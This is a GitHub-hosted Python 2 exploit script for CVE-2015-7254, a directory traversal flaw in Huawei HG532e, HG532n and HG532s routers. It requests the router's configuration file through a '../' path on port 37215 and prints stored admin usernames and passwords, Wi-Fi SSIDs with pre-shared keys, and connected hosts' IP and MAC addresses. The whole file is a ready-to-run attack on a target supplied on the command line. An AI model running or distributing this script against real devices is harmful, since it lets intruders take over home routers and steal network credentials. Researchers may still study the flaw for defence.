Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
#!/usr/bin/python
# Exploit for CVE-2015-7254 (Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices).
# Original exploit by: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick).
# Modified by: Adrian Trejo (@0xAdrian).
import logging
import sys
import urllib2
import defusedxml.ElementTree as ET
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5
USERLEVEL = 'Default Admin','User','Admin'
def fetch_url(url):
global DEFAULT_HEADERS, DEFAULT_TIMEOUT
request = urllib2.Request(url, headers=DEFAULT_HEADERS)
try:
data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
except Exception, e:
logging.error("Exception: %s", e)
data = None
return data
def exploit(ip):
url = "http://%s:37215/icon/../../../var/curcfg.xml" % (ip)
data = fetch_url(url)
return data
def getData(xml):
root = ET.fromstring(xml)
print "\n\nUsers"
for userInfoInstance in root.findall('.//UserInfoInstance'):
username = userInfoInstance.get('Username')
password = userInfoInstance.get('Userpassword')
level = int(userInfoInstance.get('Userlevel'))
print "\nUsername: " + username
print "Password: " + password
print "User Level: " + USERLEVEL[level]
print "\n\nWLAN Configuration"
for wlanConfigInstance in root.findall('.//WLANConfigurationInstance[@Enable="1"]'):
ssid = wlanConfigInstance.get('SSID')
channel = wlanConfigInstance.get('Channel')
pski = wlanConfigInstance.find('.//PreSharedKeyInstance')
psk = pski.get('PreSharedKey')
print "\nSSID: " + ssid
print "Pre Shared Key: " + psk
print "Channel: " + channel
print "\n\nHosts"
for host in root.findall('.//X_DeviceManageHostInstance'):
hostname = host.get('HostName')
ipAddr = host.get('IPAddress')
macAddr = host.get('MACAddress')
print "\nHostname: " + hostname
print "IP: " + ipAddr
print "MAC: " + macAddr
return
def main():
targetip = sys.argv[1]
print "Exploiting: " + targetip
data = exploit(targetip)
if data is None:
logging.error("Exploit failed!")
exit(-1)
print "Getting data..."
getData(data)
if __name__ == "__main__":
main()